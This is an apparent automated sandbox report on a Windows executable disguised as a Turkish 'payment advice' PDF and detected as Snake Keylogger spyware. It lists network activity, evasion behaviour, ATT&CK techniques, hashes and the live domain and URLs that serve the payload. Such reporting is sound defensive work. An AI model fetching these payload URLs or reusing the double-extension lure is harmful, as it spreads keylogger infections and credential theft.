Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.5:49704 version: TLS 1.2

System Summary

barindex
Source: initial sampleStatic PE information: Filename: #U00d6deme tavsiyesi.pdf.exe
Source: #U00d6deme tavsiyesi.pdf.exe, 00000000.00000000.2036352568.00000000007B4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDwgkbv.exe. vs #U00d6deme tavsiyesi.pdf.exe
Source: #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3907704140.0000000000BDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs #U00d6deme tavsiyesi.pdf.exe
Source: #U00d6deme tavsiyesi.pdf.exeBinary or memory string: OriginalFilenameDwgkbv.exe. vs #U00d6deme tavsiyesi.pdf.exe
Source: #U00d6deme tavsiyesi.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal80.evad.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeMutant created: NULL
Source: #U00d6deme tavsiyesi.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: #U00d6deme tavsiyesi.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: #U00d6deme tavsiyesi.pdf.exeReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeSection loaded: gpapi.dllJump to behavior
Source: #U00d6deme tavsiyesi.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: #U00d6deme tavsiyesi.pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeCode function: 0_2_01160538 push eax; ret 0_2_011605B2
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeCode function: 0_2_01160538 push eax; ret 0_2_011605C2
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeCode function: 0_2_01160568 push eax; ret 0_2_011605A2
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeCode function: 0_2_011605B8 push eax; ret 0_2_011605C2
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeCode function: 0_2_011605A8 push eax; ret 0_2_011605B2
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeCode function: 0_2_011605C8 push eax; ret 0_2_011605D2

Hooking and other Techniques for Hiding and Protection

barindex
Source: Possible double extension: pdf.exeStatic PE information: #U00d6deme tavsiyesi.pdf.exe
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeMemory allocated: 1120000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeMemory allocated: 2C80000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeMemory allocated: 2A20000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 3176Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe TID: 3176Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeThread delayed: delay time: 600000Jump to behavior
Source: #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3907704140.0000000000C19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeQueries volume information: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
DLL Side-Loading
1
Masquerading
OS Credential Dumping1
Query Registry
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Disable or Modify Tools
LSASS Memory1
Security Software Discovery
Remote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS12
System Information Discovery
Distributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
Obfuscated Files or Information
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
#U00d6deme tavsiyesi.pdf.exe66%ReversingLabsWin32.Spyware.Snakekeylogger
#U00d6deme tavsiyesi.pdf.exe100%AviraHEUR/AGEN.1351837
#U00d6deme tavsiyesi.pdf.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://balkancelikdovme.com/eyiiam/Qtmwlbx0%Avira URL Cloudsafe
https://balkancelikdovme.com/eyiiam/Qtmwlbz.dat0%Avira URL Cloudsafe
https://balkancelikdovme.com0%Avira URL Cloudsafe
https://balkancelikdovme.com/eyiiam/QtmwlbxVu0%Avira URL Cloudsafe
http://balkancelikdovme.com0%Avira URL Cloudsafe
https://balkancelikdovme.com/eyiiam/Qtmwlbz.dattooq0%Avira URL Cloudsafe
http://balkancelikdovme.comd0%Avira URL Cloudsafe
https://balkancelikdovme.com/eyiiam/Qtmwlbz.datd0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
balkancelikdovme.com
185.181.116.217
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://balkancelikdovme.com/eyiiam/Qtmwlbz.datfalse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://balkancelikdovme.comd#U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000002CFA000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://balkancelikdovme.com/eyiiam/Qtmwlbx#U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://balkancelikdovme.com/eyiiam/Qtmwlbz.dattooq#U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000002C81000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://balkancelikdovme.com/eyiiam/QtmwlbxVu#U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://balkancelikdovme.com#U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000002CFA000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name#U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000002C81000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      https://balkancelikdovme.com/eyiiam/Qtmwlbz.datd#U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000003367000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.000000000336B000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://balkancelikdovme.com#U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000003367000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.000000000336B000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      185.181.116.217
      balkancelikdovme.comUnited Kingdom
      29017GYRONGBfalse
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1576080
      Start date and time:2024-12-16 14:23:35 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 5m 10s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Run name:Run with higher sleep bypass
      Number of analysed new started processes analysed:4
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:#U00d6deme tavsiyesi.pdf.exe
      renamed because original name is a hash value
      Original Sample Name:deme tavsiyesi.pdf.exe
      Detection:MAL
      Classification:mal80.evad.winEXE@1/0@1/1
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 10
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
      • Execution Graph export aborted for target #U00d6deme tavsiyesi.pdf.exe, PID 6480 because it is empty
      • Report size getting too big, too many NtDeviceIoControlFile calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtReadVirtualMemory calls found.
      • VT rate limit hit for: #U00d6deme tavsiyesi.pdf.exe
      No simulations
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      185.181.116.217r096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
      • balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk
      r096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
      • balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      balkancelikdovme.comnew_order_xlsx.exeGet hashmaliciousDBatLoaderBrowse
      • 185.181.116.217
      new_order_xlsx.exeGet hashmaliciousDBatLoaderBrowse
      • 185.181.116.217
      r096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
      • 185.181.116.217
      r096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
      • 185.181.116.217
      0vJrK0NCd1.exeGet hashmaliciousRemcos, DBatLoader, FloodFixBrowse
      • 185.181.116.217
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      GYRONGBjew.m68k.elfGet hashmaliciousUnknownBrowse
      • 83.223.101.8
      HhaL0xmHfu.elfGet hashmaliciousMiraiBrowse
      • 89.145.115.227
      3Lf408k9mg.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
      • 91.197.228.89
      file.exeGet hashmaliciousSystemBCBrowse
      • 83.223.113.41
      NJh7IrK6IZ.elfGet hashmaliciousMiraiBrowse
      • 83.223.101.9
      a5hbkmGD7N.exeGet hashmaliciousPushdoBrowse
      • 83.223.113.46
      G7DyaA9iz9.exeGet hashmaliciousPushdoBrowse
      • 83.223.113.46
      x607DB0i08.exeGet hashmaliciousPushdoBrowse
      • 83.223.113.46
      x7RlIzQDk1.exeGet hashmaliciousUnknownBrowse
      • 83.223.113.46
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      3b5074b1b5d032e5620f69f9f700ff0eKASHI SHIP PARTICULARS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
      • 185.181.116.217
      REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
      • 185.181.116.217
      PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
      • 185.181.116.217
      CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
      • 185.181.116.217
      ZppxPm0ASs.exeGet hashmaliciousXmrigBrowse
      • 185.181.116.217
      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
      • 185.181.116.217
      PO.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
      • 185.181.116.217
      rQuotation.exeGet hashmaliciousLokibot, PureLog StealerBrowse
      • 185.181.116.217
      invoice.htmlGet hashmaliciousUnknownBrowse
      • 185.181.116.217
      No context
      No created / dropped files found
      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
      Entropy (8bit):4.359450961434568
      TrID:
      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
      • Win32 Executable (generic) a (10002005/4) 49.78%
      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
      • Generic Win/DOS Executable (2004/3) 0.01%
      • DOS Executable Generic (2002/1) 0.01%
      File name:#U00d6deme tavsiyesi.pdf.exe
      File size:6'144 bytes
      MD5:9d1dfcf9ec726eff98e8ecb0f7f38729
      SHA1:178e8d2fde6979de112a0d8441c08a92755a06f5
      SHA256:0e4b30f5efd13331e1a56c869e005ce86bfd2d0bfef5e5540371de51e5aef9fd
      SHA512:35888231f3ef25a74c05e63fc2d155cb33d781b5bf50f5635fbcfbcea9cef43f5ab67ee1085afd09e53f023f1b0279a41351b8c3df249154c8631b8252e81946
      SSDEEP:96:pEDxnWyAiaaO69ENFuj8xbiUR768qzNt:pEDxnhTOFu8xbiUR7NM
      TLSH:F2C1A521A3D94772E8B7473A9DF2B34193BCF740DC93CB9F2480660B6D0AB9449A1B61
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Wg............................j,... ...@....@.. ....................................`................................
      Icon Hash:00928e8e8686b000
      Entrypoint:0x402c6a
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Time Stamp:0x6757FF9D [Tue Dec 10 08:45:17 2024 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:4
      OS Version Minor:0
      File Version Major:4
      File Version Minor:0
      Subsystem Version Major:4
      Subsystem Version Minor:0
      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
      Instruction
      jmp dword ptr [00402000h]
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
